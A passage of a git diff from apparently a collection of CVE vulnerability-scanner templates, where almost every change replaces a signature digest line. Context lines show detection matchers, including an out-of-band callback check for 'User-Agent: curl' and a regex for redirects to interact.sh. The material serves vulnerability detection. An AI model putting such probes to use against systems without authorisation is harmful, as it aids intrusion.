4a0a00473045022100bfd7c2ed9c2260554330642228436b0446e01b961f82d9fdde59e3de9767d89f02200917f412505a2675587fa18471fb0ecd21df3dc13bf31bd7b4d66cb9427dbfb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 5231e21094f..882f161e180 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bedb8fb62410cd363785f1e2f6832e70afe6491fc8450e7ea10f4d13df21bc2102204fcb34daccd5a8293625c5594ce0a23c7aba737a681002d9fce1c8c21bea4b21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d926567b939ecb61125fbcae0764b89a1e2ee19f5e13a8e7753ffe19d3f1c360220228090032c3b37d867d72d7d9d8d3df377f22c8353e62748fc55ba6c1c4b89dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index cc7b171a046..6ff1a584fe6 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d3b43e0667577bbc77849bfa2febf4b2962329930de1f080d8b063f24400fc70022100b2ef711638242dbb12b1e3313d6abaa0d506d733f3f480651d0da125c41484a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220621d0ded7a46d9537b7d49fd6442209b9d715a1c6e3eabe0b6719bf60358ab02022100b6610b66616692827e3711cdc0176dd6d50cb5dca0f094fae6fae625ca7ee8a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 8af35fc3d3c..7345a84a352 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ad0966ec45f3c39e1ad5a01501dc8b5b47786e8e25e1a970b2e4fb49fbb7e17402203640082f1189851dc7601167dd0144d82608d0ceb007f06444c4ef6e51b658a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ef44d81d140bbf49bf4750265462e5232d901c1ba4ffbfb591da2f3688da3c2c022100ad26720c7dc2f45536e99dd29e12132f14631c161cb16f64be4f61cc1c948c98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 39dddfb1b3c..c6649ed5fb2 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ac89e675999755409a3d32120244d0df9c025365e512bf4463ce924ac226c808022100a7980b4114a114037917dd34f5f210b149c37888c5328226bc07e752264521b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1bead26e3b3907e67f63c86f6536ff15ff7e02166bae40fdeced1d93e24817e022039eac6da38149b7224ebc3f2eda39f4c6bb04a32636c82333a9447e9d7b4fb7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index febeeb97b5d..33f6d10a266 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d12c28ce6b6d5fc9c4851d3309fc1611f249e000c5c32a1dc40f03738e45e38802200da64e5ba37ee9d665b0c57b0e5130108b828ddc8699680c372b18432e12e502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022009ff650683b34b389f8e37f797333b0a7cd9ece9beb9415fcd33e2a2169a4fae0220623746d83157fdd4ac6747d087540319afc3757f5403097b1f31107d2bb92956:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 8b32c831b3c..801c2057c0c 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220642f67a2ad93380359e6cec32b8a2224645654c7ca75c6409d767f493e8cbc2f022100ec8415520673ae3b76507972f7d6c8ab47e73be255d6453515f2f6c71dbf9ba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085d427320f939f2cc8c4ee0a4ddabf3877b61ff9b115c5da80ccb2f8739555af02202394947c099965c788c652d4a56c3f46f699a89aacbc2ed3db692d5f04378a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index e0f62dec888..628a9b86345 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e82eaf4eac5695ee38d5a72663645582dcd642ee0669b40569969ea046770dd402200a4dfd8b37aae981f8882c8a35afe0f6a675af9a571ed2c0517f1b35d1a3649a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022002aff96df1db15803b44369902efb89f14b663efcf1b51e20c1f19466557168802203c6ad624b8a499c305f9e4a3c7b0ab0e7667f852fb8a3710b3a4e66fa7336f2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index fa4dd34af6e..330361c34fd 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -64,4 +64,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 490a0046304402200791ff3bb343a3237ab9b56dc42060ba0baa6e86c49a9a0cc2b4d3916bd6b9b702202b75178450336cee1ffc7f7df62fdfe4aa0b5e6463c38ab1c783e67607b26c44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097b5cb5b496fe5d3a3607bba1dc51650064fa17806ea7c8a2fe85c71584fad34022100c96b418af6b9f1839e6e2961f56c5cc94a935c8482dedbefe1f690c8240d7c74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-100004.yaml b/http/cves/2014/CVE-2014-100004.yaml index 124ebedfb64..7786d6c5030 100644 --- a/http/cves/2014/CVE-2014-100004.yaml +++ b/http/cves/2014/CVE-2014-100004.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dc4dbd9961510467af45e19683d54d5460b469f54e9f3fc125268b4853e7cbab022100a0cd451d543b926cf6cce7774a27f1dc1f30ddd366845960deb99be0885c39fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f59632c98c04e2036b526fd2462c0ac5fadea1af35c8f6c4e94d57156f29367022100eff20b6760b7fde4522fd2552827fce6f0a38cb952a16702e4b85200fb695119:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 38f69a59d02..80718012065 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a64ff64a2463ef16ca5a1ebeb1505ed4aaa65d3aac296a9280ad7bd3d4828b7a0221009070f9c596ccf27307acc13b52b10c60f948e248561f3728b7c7167c9e76987b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064f5a6f121752aeb186d158512e04a88d617a66ae53de622d78005691a9acd96022100ccc7e0be3fa1ee7ef24b8f4cc6ecd1bff743b0cb3145c00397dd56cf3f34b13b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index bb0d6ffee23..da465b4331a 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210084d1e6f10fc45c5fb9568630d72dc91536d6e95c410d008fe04970e076410f40022100a3be66a5070b9f150304df9a0f249f488b4860a51e81af452e6a00b2facff276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e350897b89ab59dafb3af4afee12b37af156b78c9efc30a60023b44bf23b4ff902202de470b18d9dc1585f0f172a917b59343600e10e8265132dd3877737ba07e46c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index d4123dfd110..9ee57a77c41 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4b0a00483046022100b2b14abd3f0e823bbc6de316ec2f1f4486baca14293bcf7e77a5b671b95ae32302210090dc671b70f329d4c5698b51ecd7e3c5f35f7fbea79afb00df19a8c20fdc42d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e439ea831bb5dcfa6d14716026275d3671b942767622d5dc900fde8f75601e88022100ab8fdb4fff88a074db91fb2f9f22fb59becfdb52656a80c9dadb61ae92c411e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 0fa20070156..464ec23648c 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dcc2854c39124ec9f242d2321ccbcb6d023ee7e6a2f20dcd706f74e261a63bf4022100a19ebec9c1e04a1787dd76c46b2c2f06b9388028865235e739735c74d953448a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085fde1b60e55defcc1b803309754a7075ce37452caa3bad90bfd077610e7bea802202c908857cbf6cbfb4b78bf6fa2fa4e6f10d4667d9e2de50e5ec25c55f4c2d786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index e4783d386b7..39d9a40d430 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d8a0c66eb7ab3d38655b407664a2e1abd5a27db0937aefa7f6659f53238cef4c022006d3c21d5f53bc7f460d57dafead07cdf9be637356147385718d5bda498c765b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d0dc2dc3f1f13feaf1f7dc6815d4e6d2d3213c56df3e79418e6de043a548479f02200db126964503a84fddbd321765289234ca36b65307b619746a2280c4dd9b45a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 80bd952710a..9d832b47586 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201c69202707c9344d9fc278085710e6403aafa5d7c8618c232ef4b025060045f002207a864fb6462a00ce2657187e2873b97d78f709325d08d4f926d651a83196bc46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f63b65bd3420688e3885e9da6a46e8a62d600743d0d31683b5ec1126d566e63022100ff13f9f52988ec57a3028493d2998dbba23fe8cdee7c73451e04a6c7c83c7e27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 9e2325fb090..37209282889 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a7a34ec8cc5931d466d299ba39dd9e9e85ff29c24eeeee0f97e257babdabc608022038892d62b1ccc3d2c5c885e111af30ea0a3616d41a2814e8269f1c600192a23b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eac5d1cc789a38d30f17f9d3d22eb68e75afa6546768fc9171be39112b81b03802203e88781937e47d49922593e95721c98717ba00c262522acf06719b03f7e45557:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 7230afd0fef..586852afa7c 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022027c28ac211f661d5e6a1223ef17d782cdd8d0b431674d86935e68120363e474b022100d24fb2fdd5eeb897e1af31dfdeefaaec363b614752e2988e97d07e95257f0273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083eef7fa6c3f4a29c4e70268b20ab1268f3c67cef27cc6e72f878d85976060d1022015b34970c6a1f88388b24a31802aacb24e3d3ef07c467853254cf0ca81ceac97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 45aa2e0c2d6..80c32c06b53 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201125967bc936a29b6878e03c32713bff2d6a823aaf0f20c1d4134ec57adaab99022100fa98e9fed8ec31233204af24158a3c6518e3b24d0f58f49e260ab198c569aa27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d1d238752113f1a1973bf139f2b098f86c91cac5fdc0d91f04c0b16d15bd93402201bcd3563b9acac6c32f1d66eab5f46248531dc85418d455d74b379f28de2a912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index a60dfdb2954..1f1259fb4f3 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202e2b8c36ee01519243648cd403d3d7cb79157aab68fba869fe8e1bda3c701ef202203d5e24b2e455009ce0597c366e396d9718f70219868a7007a707712097e1c47e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100801dd9c13af1cbc61b4ab43338256c7a4866fbc3a12201b6795ebedffb42a92402210082a28f433614d2e606b4d4394c7164a5cf5f6be7d17b0fe2ffbbd9802a4e984b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index fcee389ab3d..bccba2c6f74 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aa05cd13b069c822183944172de1ecab91c403ea2a677d7b3cc901e7b6806b90022100e19cb33955f66d8eb9a39c87d3168de5576bd77551e286d4d4e3c590140806f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c0c3e01d4e5cc27c6d6d745bed23d073a445a11ffc7eb7342619908b5c02f8c70221008612c8a65fc5a9223204cf05878721cb6d24f0358d084b382468420e26bdca1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index b56a7ddf4ff..04e718eb05e 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed526dc8128cc68098b249316ce3bb99f406c0ff2291bd8d0ec421949bc23a6602206c3fd301ee30960f609525c41c3bf5690f8b7e901ac7870a464a73ddc9dfeb8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf3ea3e8bcad0e27df7715873f8c075aeea7c78e17ea75a15aaed0c1f1279912022100c160b8da9de94297d7a785ba6a6fa4c1ace1db2e0000f08656a6e26097354108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4577.yaml b/http/cves/2014/CVE-2014-4577.yaml index 38f3c4565b7..0d7abf91eff 100644 --- a/http/cves/2014/CVE-2014-4577.yaml +++ b/http/cves/2014/CVE-2014-4577.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022009f8f44bdeff13c4449cea88b3245ad39c12e22e579ce7383221b507db33463f02204726983e066387cdd5b429d2c4d2c112779109ff52519bf8eeae5a232065a134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c481c58de94b58f015710c17a8c29131d93d7ac3406ca783cb360c652e789bae022072e36ca47e1a5bbb4c53d8e92b64ff7cdff56b62511c4a2f8ecb4f6e63f2ef50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index b8842a08ea8..6d773466df0 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210099e760708ee817a870bc22e5f44fec4db461fa8cd052815b904f37c88ed1689102210082e5ce6e41d0296ef51618151103bcd6b5e2a273127a7bbbc988a63f717f7010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a6df41743073f128b2ff41937617bd0f267bfb58bc686170a919bddee510658022040fa9fcb50c5608c7bacd011133b8e6d03adfbdccf206579622693315f805809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4941.yaml b/http/cves/2014/CVE-2014-4941.yaml index f6ee38d44d9..720832b89e4 100644 --- a/http/cves/2014/CVE-2014-4941.yaml +++ b/http/cves/2014/CVE-2014-4941.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a1cd78945c955d7743e42c269aa54d4fc5708322693109a8cf653b99d7d9073022100c06f2ffca8d2a7304e37a032bf02319449921dc9a617165db2038da4c5914121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204338939f81683abe065c8d993a7306fc071a39cf54dce741e02dc11f4c5616d1022100e0d3820ed4958aa44551cee1bf9e1f7bc4721ed1dda30d78bae19b32ef8c2402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index d9e72bb4141..5a05dad9237 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -55,4 +55,4 @@ http: group: 1 regex: - '>PHP Version <\/td><td class="v">([0-9.]+)' -# digest: 4a0a0047304502207b2597e1653583e23ba7f50a88d733bcd49fa829d918ba201f709a2a3c976a69022100d25e0c81e0a96223c90bc48b6c8e9a2559f27085dcd1dc1812506d47dec111d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210088f10413de9aeb251a9517c0ec53beea4e58917482fe9e152dba4c5dcc32effd022100ccf0a61fe64d59a9dc11dd0ebd678c25d3d187aeac219287cd0052e1f7d97c00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 8c79f912b10..4b21d51a15b 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022073d7e903deb13c330547b902d175549b936d76f01598b4a2ef6f6b4dd3d8ce1e0220121ef6651fd5026cef3b7be527baf03e3e0fb0435bf4a579bd9bbdc2edb62df0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206076017ee07c4fb39d7e1f9d76d9501332bbb8d20ce829a4ff3b15a11242fed402207d7d252055dc961cf773b24d234ef405d2cc50e32583570ca29eb33eb69e2d97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5181.yaml b/http/cves/2014/CVE-2014-5181.yaml index 1fe04d6ac2a..231258a469f 100644 --- a/http/cves/2014/CVE-2014-5181.yaml +++ b/http/cves/2014/CVE-2014-5181.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c43f66864b9e2deb8fff933df1a3866a87fd5a60d2780de6831e409d46622df702200e0b49370a3f8db109056f5ab006bf732d02a96b6f18bba77501c9a293f8f6d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097fea270541555a3fa37e41d217756b4a39850719108ee7ec51f65bbbc0201c0022100b3ec5ab2ae64a83ed887a165e679c33fd7d7012c314a0a8ea841947ac89f03c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5187.yaml b/http/cves/2014/CVE-2014-5187.yaml index 67a76a040df..4093384831c 100644 --- a/http/cves/2014/CVE-2014-5187.yaml +++ b/http/cves/2014/CVE-2014-5187.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df63df63f5b0daa2bdfa9678a89b23b528a550d9ecb3e990be8e764f519d9ad00221008c04f37d7d8172a880af8adf12e2052f990fa22ed668ac82c34712c620a1bd69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220726447cb50bbcd4587118711e731eab37b03ecb3829becb9169aedb81639b832022100ab6f079e4f31e23b2263bff90432803451f53616d2b49495c88e2e384d09ac46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 9a633e501d9..3704eb9663a 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206f88ef913282bb93b166cd3cf1aa7d82f06d972eff25a4a7c97f887fa17d2d26022100901974f8b8d8283c27bda23e51c30de38de6dec84bc48954ae0d4224851a3664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003fe00f4aaec5953d3c39143a3181789a653b4efad17e262dd242edb531f68d702205f78bafe5b95f4c64cbee989ff932d8955e7bc1abcc3828d49766ed64526f2aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 5b818af2d09..1d8c2260ba4 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f9841219f58204cf73200a9b382a0934ded1ef34e8bfdfd458488df4ccabb0ab02203848e45fbc0cbd3523b1f2b86c9f00f0b67a1c0be48955c806af72cb864f340d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9ca1d4f76d7bc6de000d6125059475a979ad90c20ff865674887d20a1a89ec80220763d67abeaa1ae99ea5bee2e7122ce8b7ab6b856af8a0f063c247e46d69b443f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index f2400729a6f..5a251499812 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210093b49260e77cbdd630a2481fc86b7c8b868923ac6fb4b27350ca27af20dddab102201d3b03c43d2b0fb9cc8d60b51eacab903714d72c4abe11c0b9f09b52fbed36d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c93dad230dc399ee0a9b32c47136d6726cb5961a8143fbe6a6f7d6744b8c80dd022100f93cebc28eea016042c0b9bff73b1b637468291506a69a1e185158b4b2fe0118:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 3d3332b6b0d..1f683f9a93c 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022036f2394b3f4954d596f699abbae16b5a71e96942c8d59b4d1bd7b2164207f2cd0221009f3fe50a9f0e5a8e022a2ffc3fc3624c3019de5b971672833d5458abc18433ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aad97247149f297896205e8c692c6beb175d6d72bff63aac2fa17697e266ea61022048e792bd17da0ffb9cb7779e51917da5ff9cee92067f97342896140464018881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 6689c013ea6..80bca1c3094 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210084b04b47462c3da197f8107df97c214f11b91f6455ef2ffa0b652061886b7f3d022100c04872b158269cfd8ae9b5a5b813c9713ec57613730628c43104a412ce2f648e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220430f207ab5fb36cba6aa870cb8ad7ce7d1f46216ad065d43266df71ba5fa5154022062246adf559dfe7fb793a0b3ad257daee4bd1f9057bbffce91430e05ce45acef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 6251e69c3da..a3137f3115e 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a0046304402207a2c4e5ec3ef9f92a0337bad88655aa31ab29ccadaf3dd70a825d17a4f0916fe022044431a5dc8be7e7ce99d6ec53b2aae2a268ed0f331cdb44068307a54b0e522c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d0eb0c533bf09932b3e9fca9dfddd2cbf1806ba02aa371761f356f0ffcc4c3ec022100c5f431fbc4447716920f9ad9b01f84437de56105ba28105b4836dfd8b900cda5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index b8214a74ca0..2dd35376321 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c2c3d22576c4a5da8a09ea067f58174f257428b1cf201f6327637a86d9dc780c022100cfa8be1d71b1f8dc3db21f4ba0957d616b5b949aa5f5b8b47dcc70bf65373951:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100da7464aadc7b610ccc4e7ff487367b84e3c5dc2b8d728c678d90735b5e0ea411022100f0d5e7bca64ad01c333c947300ebab8acf7dcc57b86d3625af97db22360a0d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 5dea3477756..6b7a39dc677 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c94b16fe4745e9e237b44ad1c93e884380fe998d056eeff8031cfe3fe443e6060220163d1501bb27c617b514594b81b0482b7e19dc5420129d925138ac2d2964a805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc32bded1add0bc976174bf3ecafb3984b205d3580fd81497d488dd65ac6b3d3022100d26d7d77ba10fb47e3a743f038b1e61babb09365e78181ea32ea6faeeddd607e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 38ce4b0ee61..c0d6b0f3f3f 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -48,4 